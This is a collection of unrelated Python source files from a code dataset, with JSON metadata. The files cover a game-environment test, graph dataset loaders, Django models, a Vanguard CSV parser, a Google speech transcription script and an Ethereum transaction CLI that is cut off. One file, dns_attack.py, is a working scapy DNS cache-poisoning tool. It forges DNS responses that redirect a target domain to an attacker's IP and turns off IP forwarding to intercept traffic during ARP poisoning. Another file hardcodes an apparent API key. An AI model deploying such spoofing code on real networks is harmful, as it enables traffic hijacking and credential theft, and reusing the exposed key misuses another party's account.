env.render()\r\n# Para guardar imagenes\r\n# img = Image.fromarray(obs, 'RGB')\r\n# img.save('my_gvg.png')\r\nenv.render()\r\nenv.reset()\r\n\r\n# Obtener el input shape y reducir la ultima dimension a 3 (se elimina el canal alfa)\r\n# shape = list(env.observation_space.shape)\r\n# shape[2] = 3\r\n# shape = tuple(shape)\r\n\r\nsave_img = False\r\nscore = 0\r\nisOver = False\r\ni = 0\r\n\r\nwhile not isOver:\r\n action_id = env.action_space.sample()\r\n state, reward, isOver, info = env.step(action_id)\r\n # state = env.render()\r\n score += reward\r\n i += 1\r\n if save_img:\r\n img = Image.fromarray(state, 'RGB')\r\n img.save('tfm_exp_before_' + str(i) + '.png')\r\n # if i == 10:\r\n # game_state = env.game.get_game_state()\r\n # print(\"Guardando estado del juego\")\r\n\r\nprint(\"Score: \" + str(score))\r\nprint(\"i: \" + str(i))\r\n\r\n# env.game.set_game_state(game_state)\r\n# print(\"Cargando estado del juego\")\r\n\r\nenv.render()\r\nenv.reset()\r\n\r\nscore = 0\r\nisOver = False\r\ni = 0\r\n\r\nwhile not isOver:\r\n action_id = env.action_space.sample()\r\n state, reward, isOver, info = env.step(action_id)\r\n # state = env.render()\r\n score += reward\r\n i += 1\r\n if save_img:\r\n img = Image.fromarray(state, 'RGB')\r\n img.save('tfm_exp_after_' + str(i) + '.png')\r\n\r\nprint(\"Score: \" + str(score))\r\nprint(\"i: \" + str(i))\r\n","sub_path":"tfm_experimento.py","file_name":"tfm_experimento.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"575066900","text":"import torch\n\nfrom torch.utils.data import Dataset\nfrom torch_geometric.data import Data\nimport torch_geometric.data as PyGdata\n\nimport os\nimport glob\nimport pandas as pd\nimport numpy as np\nimport h5py\nimport re\nimport sys\nfrom pathlib import Path\n\n\ndef edge_index_from_file(graph_file):\n edge_index = np.genfromtxt(graph_file, delimiter=\"\\t\", dtype=int)\n edge_index = np.transpose(edge_index)\n edge_index = torch.tensor(edge_index, dtype=torch.long)\n # edge_index = torch.tensor(edge_index, dtype=torch.long).unsqueeze(-1)\n return edge_index\n\n\nclass NTIGADataset_simulator(PyGdata.Dataset):\n def __init__(\n self, path, root=None, transform=None, pre_transform=None, pre_filter=None\n ):\n p = os.path.dirname(path)\n self.file_path = path\n\n self.graph_edge_file = p + \"/pipe_graph_topo_17_local.txt\"\n\n self.edge_index = edge_index_from_file(self.graph_edge_file)\n\n with h5py.File(self.file_path, \"r\") as file:\n self.dataset_len = len(file[\"feature\"])\n self.feature = file[\"feature\"][:]\n self.target = file[\"target\"][:]\n\n self.num_in = self.feature.shape[-1]\n self.num_out = self.target.shape[-1]\n\n @property\n def raw_file_names(self):\n return\n\n @property\n def processed_file_names(self):\n return\n\n def __len__(self):\n return self.dataset_len\n\n def __getitem__(self, idx):\n\n # X = torch.from_numpy(self.feature[idx, :, :, :]).unsqueeze(0)\n # Y = torch.from_numpy(self.target[idx, :, :, :]).unsqueeze(0)\n # graph_data = Data(x=X, edge_index=self.edge_index.unsqueeze(-1), y=Y)\n\n X = torch.from_numpy(self.feature[idx, :, :, :]).permute(1, 2, 0)\n Y = torch.from_numpy(self.target[idx, :, :, :]).permute(1, 2, 0)\n graph_data = Data(x=X, edge_index=self.edge_index, y=Y)\n return graph_data\n\n\nclass NTIGADataset_new(PyGdata.Dataset):\n def __init__(\n self,\n file_path,\n recursive,\n load_data,\n data_cache_size=3,\n root=None,\n transform=None,\n pre_transform=None,\n pre_filter=None,\n ):\n # super(NTIGADataset, self).__init__(root, transform, pre_transform)\n\n self.data_info = []\n self.data_cache = {}\n self.data_cache_size = data_cache_size\n self.transform = transform\n\n p = Path(file_path)\n assert p.is_dir()\n if recursive:\n files = sorted(p.glob(\"**/*.h5\"))\n else:\n files = sorted(p.glob(\"*.h5\"))\n if len(files) < 1:\n raise RuntimeError(\"No hdf5 datasets found\")\n\n for h5dataset_fp in files:\n self._add_data_infos(str(h5dataset_fp.resolve()), load_data)\n\n self.graph_edge_file = file_path + \"/pipe_graph_topo_17_local.txt\"\n self.edge_index = edge_index_from_file(self.graph_edge_file)\n\n # p = os.path.dirname(path)\n # self.file_path = path\n # self.feature = None\n # self.target = None\n # with h5py.File(self.file_path, \"r\") as file:\n # self.dataset_len = len(file[\"feature\"])\n\n @property\n def raw_file_names(self):\n return\n\n @property\n def processed_file_names(self):\n return\n\n def __getitem__(self, index):\n X = self.get_data(\"feature\", index)\n Y = self.get_data(\"target\", index)\n\n X = torch.from_numpy(X)\n Y = torch.from_numpy(Y)\n\n graph_data = Data(x=X, edge_index=self.edge_index, y=Y)\n\n return graph_data\n\n def __len__(self):\n return len(self.get_data_infos(\"feature\"))\n\n def _add_data_infos(self, file_path, load_data):\n with h5py.File(file_path, \"r\") as h5_file:\n # Walk through all groups, extracting datasets\n # for gname, group in h5_file.items():\n # for dname, ds in group.items():\n for dname, ds in h5_file.items():\n for _tensor in ds[()]:\n # if data 
is not loaded its cache index is -1\n idx = -1\n if load_data:\n # add data to the data cache\n idx = self._add_to_cache(_tensor, file_path)\n\n # type is derived from the name of the dataset; we expect the dataset\n # name to have a name such as 'data' or 'label' to identify its type\n # we also store the shape of the data in case we need it\n self.data_info.append(\n {\n \"file_path\": file_path,\n \"type\": dname,\n \"shape\": _tensor.shape,\n \"cache_idx\": idx,\n }\n )\n\n def _load_data(self, file_path):\n \"\"\"Load data to the cache given the file\n path and update the cache index in the\n data_info structure.\n \"\"\"\n with h5py.File(file_path, \"r\", swmr=True) as h5_file:\n # for gname, group in h5_file.items():\n # for dname, ds in group.items():\n for dname, ds in h5_file.items():\n for _tensor in ds[()]:\n # add data to the data cache and retrieve\n # the cache index\n idx = self._add_to_cache(_tensor, file_path)\n\n # find the beginning index of the hdf5 file we are looking for\n file_idx = next(\n i\n for i, v in enumerate(self.data_info)\n if v[\"file_path\"] == file_path\n )\n\n # the data info should have the same index since we loaded it in the same way\n self.data_info[file_idx + idx][\"cache_idx\"] = idx\n\n # remove an element from data cache if size was exceeded\n if len(self.data_cache) > self.data_cache_size:\n # remove one item from the cache at random\n removal_keys = list(self.data_cache)\n removal_keys.remove(file_path)\n self.data_cache.pop(removal_keys[0])\n # remove invalid cache_idx\n self.data_info = [\n {\n \"file_path\": di[\"file_path\"],\n \"type\": di[\"type\"],\n \"shape\": di[\"shape\"],\n \"cache_idx\": -1,\n }\n if di[\"file_path\"] == removal_keys[0]\n else di\n for di in self.data_info\n ]\n\n def _add_to_cache(self, data, file_path):\n \"\"\"Adds data to the cache and returns its index. There is one cache\n list for every file_path, containing all datasets in that file.\n \"\"\"\n if file_path not in self.data_cache:\n self.data_cache[file_path] = [data]\n else:\n self.data_cache[file_path].append(data)\n return len(self.data_cache[file_path]) - 1\n\n def get_data_infos(self, type):\n \"\"\"Get data infos belonging to a certain type of data.\n \"\"\"\n data_info_type = [di for di in self.data_info if di[\"type\"] == type]\n return data_info_type\n\n def get_data(self, type, i):\n \"\"\"Call this function anytime you want to access a chunk of data from the\n dataset. This will make sure that the data is loaded in case it is\n not part of the data cache.\n \"\"\"\n fp = self.get_data_infos(type)[i][\"file_path\"]\n if fp not in self.data_cache:\n self._load_data(fp)\n\n # get new cache_idx assigned by _load_data_info\n cache_idx = self.get_data_infos(type)[i][\"cache_idx\"]\n return self.data_cache[fp][cache_idx]\n","sub_path":"GNNmodel/datasets/NTIGA_simulator_time.py","file_name":"NTIGA_simulator_time.py","file_ext":"py","file_size_in_byte":7705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
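Both loaders assume an HDF5 layout with top-level "feature" and "target" datasets indexed by sample; NTIGADataset_simulator additionally expects pipe_graph_topo_17_local.txt next to the file. A minimal sketch that writes a compatible toy file; the array shapes are invented, only the dataset names come from the loaders:

import h5py
import numpy as np

with h5py.File("toy.h5", "w") as f:
    f.create_dataset("feature", data=np.random.rand(8, 4, 17, 3).astype(np.float32))
    f.create_dataset("target", data=np.random.rand(8, 2, 17, 3).astype(np.float32))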
+{"seq_id":"357325005","text":"import threading\n\nfrom scapy.all import *\nfrom scapy.layers.dns import DNS, DNSRR, DNSQR\nfrom scapy.layers.inet import UDP, IP\nfrom datetime import datetime\n\n\nclass DnsPois:\n\n def __init__(self):\n self.pois_vic_instead = False\n self.auth_ip = None\n self.rec_ip = None\n self.domain = None\n self.mal_ip = None\n self.stop = False\n self.thread = None\n self.stop_thread = None\n self.stop = False\n self.save = False\n\n @staticmethod\n def responder(auth_ip, rec_ip, mal_ip, domain, poison_vic):\n \"\"\"\n Forwards a packet to the original recipient if it is not a packet we wish to falsify\n \"\"\"\n\n def forward(pkt):\n send(pkt, verbose=0)\n\n \"\"\"\n Looks at a packet and decides whether it contains a DNS response for the domain we wish to spoof\n if so we falsify the packet\n if not we forward the packet to its original recipient\n \"\"\"\n\n def get_resp(pkt):\n\n if poison_vic:\n if DNS in pkt and str(pkt[IP].src) == auth_ip and str(pkt[IP].dst) == rec_ip and pkt.haslayer(UDP):\n if domain in str(pkt['DNS Question Record'].qname):\n spf_resp = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\\n UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\\n DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\n an=(DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=mal_ip)))\n send(spf_resp, verbose=0)\n return \"Sent a spoofed DNS response to \" + str(pkt['DNS Question Record'].qname)\n else:\n return forward(pkt)\n else:\n return forward(pkt)\n elif not poison_vic:\n if DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0 and str(pkt[IP].src) == rec_ip and \\\n str(pkt[IP].dst) == auth_ip:\n\n if domain in str(pkt['DNS Question Record'].qname):\n spf_resp = IP(dst=pkt[IP].src, src=pkt[IP].dst) / UDP(dport=pkt[UDP].sport,\n sport=pkt[UDP].dport) / DNS(\n id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, qdcount=1, rd=1, ancount=1, nscount=0,\n arcount=0,\n an=(DNSRR(rrname=pkt[DNS].qd.qname, type='A', ttl=3600, rdata=mal_ip)))\n send(spf_resp, verbose=0)\n return \"Sent a spoofed DNS response to \" + str(pkt['DNS Question Record'].qname)\n else:\n return forward(pkt)\n else:\n return forward(pkt)\n else:\n return forward(pkt)\n\n return get_resp\n\n def set(self, auth_dns, rec_dns, mal_dns, dom, save, poison_vic):\n \"\"\"\n Set all the information needed for a DNS cache poisoning attack\n :param auth_dns:\n :param rec_dns:\n :param mal_dns:\n :param dom:\n :param save:\n :return:\n \"\"\"\n self.domain = dom\n self.auth_ip = auth_dns\n self.rec_ip = rec_dns\n self.mal_ip = mal_dns\n self.save = save\n self.pois_vic_instead = poison_vic\n\n def start(self):\n \"\"\"\n Start the DNS cache poisoning attack\n :return:\n \"\"\"\n print(\"domain: \" + self.domain)\n print(\"auth server: \" + self.auth_ip)\n print(\"NS: \" + self.rec_ip)\n print(\"Fake site: \" + self.mal_ip)\n\n # Since ARP poisoning ongoing is a prerequisite\n # We have to turn off automatic forwarding\n # else the packets are forwarded before we can spoof them\n try:\n with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf:\n ipf.write('0\\n')\n print(\"Turned off auto forward pilot, switching to manual..\")\n except FileNotFoundError:\n pass\n\n self.stop = False\n self.thread = threading.Thread(target=self.sniff)\n self.thread.start()\n\n def sniff(self):\n \"\"\"\n Sniff the network with a stop_filter (@self.stopfilter)\n :return:\n \"\"\"\n print(\"Poisoning vic instead? 
: \" + str(self.pois_vic_instead))\n packets = sniff(prn=self.responder(self.auth_ip, self.rec_ip, self.mal_ip, self.domain, self.pois_vic_instead),\n stop_filter=self.stopfilter)\n if self.save:\n wrpcap('../pcap_files/' + str(datetime.now().time().strftime(\"%H_%M_%S\")) + '_DNS_cache_poisoning.pcap', packets)\n\n def stop_poisoning(self):\n \"\"\"\n Stop ARP cache poisoning\n :return:\n \"\"\"\n self.stop = True\n # self.stop_thread = threading.Thread(target=self.restore_network)\n\n def stopfilter(self, x):\n \"\"\"\n The stop filter\n :param x: a packet\n :return:\n \"\"\"\n if self.stop:\n return True\n else:\n return False\n","sub_path":"src/attacks/dns_attack.py","file_name":"dns_attack.py","file_ext":"py","file_size_in_byte":5163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"344838240","text":"# coding=utf-8\nclass Bankcard(object):\n def __init__(self):\n self.id = 0\n self.time = 0\n self.user_id = 0\n self.rel_name = ''\n self.bank_name = ''\n self.bank_address = ''\n self.phone_num = ''\n self.bank_card_num = ''\n","sub_path":"mode/bankcard.py","file_name":"bankcard.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"114706197","text":"from django.db import models\n\n\nclass Film(models.Model):\n class Meta:\n verbose_name = u'Фильм'\n verbose_name_plural = u'Фильмы'\n\n def __str__(self):\n return self.title\n\n title = models.CharField(\n verbose_name=u'Название фильма',\n max_length=255,\n blank=False,\n )\n\n year = models.PositiveSmallIntegerField(\n verbose_name=u'Год выпуска',\n blank=False,\n )\n\n FORMAT_VHS = 'v'\n FORMAT_DVD = 'd'\n FORMAT_BLU = 'b'\n FORMAT_CHOICES = (\n (FORMAT_VHS, 'VHS'),\n (FORMAT_DVD, 'DVD'),\n (FORMAT_BLU, 'Blu-Ray'),\n )\n\n format = models.CharField(\n verbose_name=u'Формат',\n max_length=1,\n choices=FORMAT_CHOICES,\n )\n\n actors = models.ManyToManyField(\n 'Actor',\n verbose_name=u'Актеры',\n blank=True,\n )\n\n\nclass Actor(models.Model):\n class Meta:\n verbose_name = u'Актер'\n verbose_name_plural = u'Актеры'\n\n def __str__(self):\n return self.name\n\n name = models.CharField(\n verbose_name=u'Имя',\n max_length=255,\n blank=False,\n )\n","sub_path":"src/webby_test_api/filmsdb/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"549452102","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 25 13:11:20 2020\n\n@author: aadi\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport requests\n\nresponse = requests.post(\n 'https://api.remove.bg/v1.0/removebg',\n data={\n 'image_url': 'https://assets.myntassets.com/h_1440,q_90,w_1080/v1/assets/images/2272100/2018/2/19/11519021065151-Difference-of-Opinion-Men-Mustard-Printed-Round-Neck-T-shirt-1021519021064962-3.jpg',\n 'size': 'auto'\n },\n headers={'X-Api-Key': 'y5XdMgNewA7Wog1ZyXTj67sK'},\n)\nif response.status_code == requests.codes.ok:\n with open('1.png', 'wb') as out:\n out.write(response.content)\nelse:\n print(\"Error:\", response.status_code, response.text)\n\n\nmin_YCrCb = np.array([0,133,77],np.uint8)\nmax_YCrCb = np.array([235,173,127],np.uint8)\n\n# Get pointer to video frames from primary device\nimage = cv2.imread(\"1.png\")\nimageYCrCb = cv2.cvtColor(image,cv2.COLOR_BGR2YCR_CB)\nskinRegionYCrCb = cv2.inRange(imageYCrCb,min_YCrCb,max_YCrCb)\n\nskinYCrCb = cv2.bitwise_and(image, image, mask = skinRegionYCrCb)\n\ncv2.imwrite(\"1.png\", np.hstack([image,skinYCrCb]))\nimg = cv2.imread(\"1.png\")\nheight, width = img.shape[:2]\n\n# Cut the image in half\nwidth_cutoff = width // 2\ns1 = img[:, :width_cutoff]\ns2 = img[:, width_cutoff:]\n\n\n\n\ndif2 = cv2.absdiff(s1, s2)\ncv2.imwrite(\"final3.png\", dif2)\n\nheight, width = dif2.shape[:2]\n\n# Cut the image in 1/3rd\nh_cutoff = height// 3\ns2 = dif2[h_cutoff:,: ]\ncv2.imwrite(\"face2.png\", s2)\n","sub_path":"Ecommerce website/Holmes_404_Myntra-main/Myntra/MixAndMatch/ClothesExtract.py","file_name":"ClothesExtract.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"253617263","text":"from actions.functions import *\n\n\ndef _welcome():\n print()\n print(\"*\"*21, \"Welcome\", \"*\"*21)\n print(\"*\" * 51)\n print(\"\\n1.-New register\")\n print(\"2.-Delete register\")\n print(\"3.-Search register\")\n print(\"4.-Exit\")\n\n try:\n op = int(input(\":\"))\n return op\n except Exception:\n _welcome()\n\n\nif __name__ == \"__main__\":\n option = 0\n while option != 4:\n option = _welcome()\n if option == 1:\n\n new_register()\n\n elif option == 2:\n\n delete_register()\n\n elif option == 3:\n\n search_register()\n\n elif option == 4:\n\n exit()\n\n else:\n\n print(\"Invalid option\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"248188911","text":"from google.cloud import storage\nfrom google.cloud import speech_v1p1beta1 as speech\nimport os\nimport io\nimport subprocess\nimport datetime\nimport math\n\n# Settings\nfilepath = os.path.expanduser(os.sep.join([\"~\", \"Downloads/for-transcript/\"])) # all files from this folder will be transcribed\noutput_filepath = os.path.expanduser(os.sep.join([\"~\", \"Downloads/transcripts/\"])) # ready text files will be in this folder\nbucketname = \"for-text-converting\" # your name here\nlanguage_code = 'en' # https://cloud.google.com/speech-to-text/docs/languages\nalternative_language_codes = [\n \"ru\",\n] # up to 6 codes here\nenable_speaker_diarization = True # set True if there are multiple speakers in audio files\n\n\ndef prepare_audio(filepath, audio_file_name):\n print(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n + ' Converting audio… ', end=\"\", flush=True)\n current_file = filepath + audio_file_name\n destination_file = current_file.split('.')[0] + '.opus'\n subprocess.run(['ffmpeg', '-y', '-i', current_file, '-vn', '-acodec', 'libopus', '-ac', '1',\n '-b:a', '128k', '-ar', '48000', destination_file, '-loglevel', 'warning'])\n print('Done')\n audio_file_name = audio_file_name.split('.')[0] + '.opus'\n return audio_file_name\n\n\ndef upload_blob(bucket_name, source_file_name, destination_blob_name):\n print(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n + ' Uploading, might take a while… ', end=\"\", flush=True)\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n blob.upload_from_filename(source_file_name)\n print('Done')\n\n\ndef delete_blob(bucket_name, blob_name):\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(blob_name)\n blob.delete()\n\ndef get_transcribing_time(file_name):\n p = subprocess.run(['ffprobe', '-v', \"error\", \"-show_entries\", \"format=duration\",\n \"-of\", \"default=noprint_wrappers=1:nokey=1\", file_name], capture_output=True)\n length = float(p.stdout)\n transcribing_time = math.ceil(length / 2 / 60) # on average, transcribing speed is 2x from duration\n return transcribing_time\n\ndef google_transcribe(audio_file_name):\n\n audio_file_name = prepare_audio(filepath, audio_file_name)\n file_name = filepath + audio_file_name\n audio_format = speech.enums.RecognitionConfig.AudioEncoding.OGG_OPUS\n sample_rate = 48000\n bucket_name = bucketname\n\n upload_blob(bucket_name, file_name, audio_file_name)\n\n gcs_uri = 'gs://' + bucketname + '/' + audio_file_name\n transcript = ''\n\n client = speech.SpeechClient()\n audio = speech.types.cloud_speech_pb2.RecognitionAudio(uri=gcs_uri)\n\n config = {\n \"enable_speaker_diarization\": enable_speaker_diarization,\n \"language_code\": language_code,\n \"alternative_language_codes\": alternative_language_codes,\n \"encoding\": audio_format,\n \"sample_rate_hertz\": sample_rate,\n }\n\n transcribing_time = get_transcribing_time(file_name)\n print(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n + ' Transcribing, estimate waiting time is ' + str(transcribing_time) + ' min… ', end=\"\", flush=True)\n\n # Detects speech in the audio file\n operation = client.long_running_recognize(config, audio)\n response = operation.result(timeout=10000)\n result = response.results[-1]\n words_info = result.alternatives[0].words\n\n tag = 1\n speaker = \"\"\n\n for word_info in words_info:\n if word_info.speaker_tag == tag:\n speaker = 
speaker+\" \"+word_info.word\n else:\n transcript += \"speaker {}: {}\".format(tag, speaker) + \"\\n\"\n tag = word_info.speaker_tag\n speaker = \"\"+word_info.word\n\n transcript += \"speaker {}: {}\".format(tag, speaker)\n\n delete_blob(bucket_name, audio_file_name)\n os.remove(file_name)\n return transcript\n\n\ndef write_transcript(transcript_filename, transcript):\n f = open(output_filepath + transcript_filename,\n \"w+\", encoding=\"utf-8\", errors=\"ignore\")\n f.write(transcript)\n f.close()\n print('Done.')\n\n\nif __name__ == \"__main__\":\n for audio_file_name in os.listdir(filepath):\n exists = os.path.isfile(\n output_filepath + audio_file_name.split('.')[0] + '.txt')\n if exists:\n pass\n else:\n print(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n + \" Starting file \" + audio_file_name)\n transcript = google_transcribe(audio_file_name)\n transcript_filename = audio_file_name.split('.')[0] + '.txt'\n write_transcript(transcript_filename, transcript)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"124577898","text":"def title_case(title, minor_words=''):\n title_words = title.split(' ')\n if title == '':\n return ''\n if minor_words == '':\n return ' '.join([x.capitalize() for x in title_words])\n fin = \"\"\n low_words = minor_words.split(' ')\n lw = [x.lower() for x in low_words]\n\n for i in range(len(title_words)):\n if i == 0 or title_words[i].lower() not in lw:\n fin += title_words[i].lower().capitalize()\n fin += ' '\n else:\n fin += title_words[i].lower()\n fin += ' '\n\n return fin[:-1]\n\n\ndef title_case2(title, minor_words=''):\n title = title.capitalize().split()\n minor_words = minor_words.lower().split()\n return ' '.join([word if word in minor_words else word.capitalize() for word in title])","sub_path":"6kyu/title_case.py","file_name":"title_case.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"22515542","text":"import csv\nfrom collections import namedtuple\n\nclass VanguardData:\n\n\tmutualFundAccts = []\n\tmutualFundTxns = []\n\tbrokerageAccts = []\n\tbrokerageTxns = []\n\tcompanyAccts = []\n\tcompanyAcctTxns = []\n\n\ndef read_csv_file(fileName):\n\twith open(fileName, 'r') as inputFile:\n\t\tdef remove_empty_terminal_fields(records) :\n\t\t\tfor record in records:\n\t\t\t\tif not record:\n\t\t\t\t\tyield ()\n\n\t\t\t\tif record and not record[-1]:\n\t\t\t\t\tdel(record[-1])\n\t\t\t\tyield tuple(record)\n\n\t\tcsvReader = csv.reader(inputFile)\n\t\trecordValues = list(remove_empty_terminal_fields(csvReader))\n\n\treturn recordValues\n\n\ndef process_records(fileRecords):\n\tRecordTypeList = namedtuple('RecordTypeList', \"RecordType,Values\")\n\tRecordMapping = namedtuple(\"RecordMapping\", \"Name,Header,Values\")\n\n\t# constant tuples for each record type header that may be in the file\n\tMF_ACCT = ('Fund Account Number', 'Fund Name', 'Price', 'Shares', 'Total Value')\n\n\tMF_TXN = ('Account Number', 'Trade Date', 'Process Date',\n\t\t'Transaction Type', 'Transaction Description', 'Investment Name',\n\t\t'Share Price', 'Shares', 'Gross Amount', 'Net Amount')\n\n\tBROKERAGE_ACCT = ('Account Number','Investment Name','Symbol','Shares','Share Price','Total Value')\n\n\tBROKERAGE_TXN = ('Account Number', 'Trade Date', 'Settlement Date',\n\t\t'Transaction Type', 'Transaction Description', 'Investment Name', 'Symbol',\n\t\t'Shares', 'Share Price', 'Principal Amount', 'Commission Fees', 'Net Amount',\n\t\t'Accrued Interest', 'Account Type')\n\n\tCOMPANY_ACCT = ('Plan Number','Plan Name','Fund Name','Shares','Price','Total Value')\n\n\tCOMPANY_ACCT_TXN = ('Account Number','Trade Date','Run Date','Transaction Activity','Transaction Description',\n\t\t'Investment Name','Share Price','Transaction Shares','Dollar Amount')\n\n\ttxns = VanguardData()\n\trecordMappings = [\n\t\tRecordMapping(\"MfAccount\", MF_ACCT, txns.mutualFundAccts),\n\t\tRecordMapping(\"MfTransaction\", MF_TXN, txns.mutualFundTxns),\n\t\tRecordMapping(\"BrokerageAccount\", BROKERAGE_ACCT, txns.brokerageAccts),\n\t\tRecordMapping(\"BrokerageTransaction\", BROKERAGE_TXN, txns.brokerageTxns),\n\t\tRecordMapping(\"CompanyAccount\", COMPANY_ACCT, txns.companyAccts),\n\t\tRecordMapping(\"CompanyAccountTransaction\", COMPANY_ACCT_TXN, txns.companyAcctTxns)\n\t]\n\n\t# build mapping of header record to named tuple type and value list for each record type\n\t# field names in tuple types are header field names with spaces removed\n\trecTypes = { (): None }\n\tfor mapping in recordMappings:\n\t\trecTypes[mapping.Header] = \\\n\t\t\tRecordTypeList(namedtuple(mapping.Name, [x.replace(' ','') for x in mapping.Header]), mapping.Values)\n\n\t#every record is either going to set the \"state\" or be added to the\n\t#appropriate list for that record type\n\tcurrentType = None\n\tfor rec in fileRecords:\n\t\tif rec in recTypes:\n\t\t\tcurrentType = recTypes[rec]\n\t\t\tcontinue\n\n\t\tif currentType != None:\n\t\t\tcurrentType.Values.append(currentType.RecordType._make(rec))\n\n\treturn txns\n","sub_path":"vanguard.py","file_name":"vanguard.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"70309592","text":"import os\nimport sys\nPROGECT_ROOT = \"/\".join(os.path.dirname(os.path.abspath(__file__)).split(\"/\")[:-1])\nif PROGECT_ROOT not in sys.path:\n sys.path.append(PROGECT_ROOT)\nKEYS_ROOT = \"{}/keys\".format(PROGECT_ROOT)\nif not os.path.exists(KEYS_ROOT):\n os.makedirs(KEYS_ROOT, mode=0o755)\n\nimport node\nimport pickle\n\n\nCLEAR_TERMINAL = \"clear\"\n\n\nclass bcolors:\n PURPLE = '\\033[95m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n CLEAR = '\\033[0m'\n BOLDWHITE = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\ndef show_accounts(exclude=0):\n accounts_template = \"\"\n i = 1\n for account in node.get_list_accounts():\n if i != exclude:\n accounts_template += \"Account #{3}{0}{4}: {1} | Balance: {2}.\\n\".format(\n i,\n account,\n node.get_balance(address=account),\n bcolors.YELLOW,\n bcolors.CLEAR\n )\n else:\n accounts_template += \"\\n\"\n i += 1\n template = \"\"\"\n \\r######## Accounts list ########\\n\n \\r{}\n \\r###############################\n \"\"\".format(accounts_template)\n print(template)\n\n\ndef show_enter_data(data):\n for key in data:\n print(\"{0}: {1}\".format(key.replace(\"_\", \" \"), transaction[key]))\n\n\nif __name__ == '__main__':\n # check_path_key()\n transaction = {}\n \"\"\"\n from\n \"\"\"\n os.system(CLEAR_TERMINAL)\n show_accounts()\n show_enter_data(transaction)\n number_from = 0\n while not (0 < number_from <= len(node.get_list_accounts())):\n try:\n number_from = int(input(\"Enter number account 'FROM' >> \"))\n except ValueError:\n print(\"Error enter number account 'FROM'.\")\n show_accounts()\n transaction[\"from\"] = node.get_list_accounts()[number_from-1]\n balance = node.get_balance(address=transaction.get(\"from\"))\n \"\"\"\n to\n \"\"\"\n os.system(CLEAR_TERMINAL)\n show_accounts(exclude=number_from)\n show_enter_data(transaction)\n number_to = 0\n while not (0 < number_to <= len(node.get_list_accounts()) and\n number_to != number_from):\n try:\n number_to = int(input(\"Enter number account 'TO' >> \"))\n except ValueError:\n print(\"Error enter number account 'TO'.\")\n show_accounts(exclude=number_from)\n transaction[\"to\"] = node.get_list_accounts()[number_to-1]\n \"\"\"\n money\n \"\"\"\n correct = False\n while not correct:\n \"\"\"\n gas price\n \"\"\"\n os.system(CLEAR_TERMINAL)\n show_accounts()\n show_enter_data(transaction)\n while not transaction.get(\"gasPrice\"):\n try:\n cost = int(input(\"Enter cost GAS >> \"))\n except ValueError:\n print(\"Error enter cost GAS.\")\n else:\n if (cost < balance):\n transaction[\"gasPrice\"] = cost\n else:\n print(\"Error enter cost GAS, there is not enough money to make a transaction\")\n key = input(\"Re-enter? [Y/n] >> \")\n if not key or key.lower() == \"y\":\n continue\n else:\n exit(-1)\n if not transaction.get(\"gasPrice\"):\n continue\n \"\"\"\n count gas\n \"\"\"\n os.system(CLEAR_TERMINAL)\n show_accounts()\n show_enter_data(transaction)\n while not transaction.get(\"gas\"):\n try:\n count = int(input(\"Enter count GAS for transaction >> \"))\n except ValueError:\n print(\"Error enter count GAS for transaction.\")\n else:\n if (count * transaction[\"gasPrice\"]) < balance:\n transaction[\"gas\"] = count\n else:\n print(\"Error enter coutn GAS, there is not enough money to make a transaction\")\n key = input(\"Re-enter? 
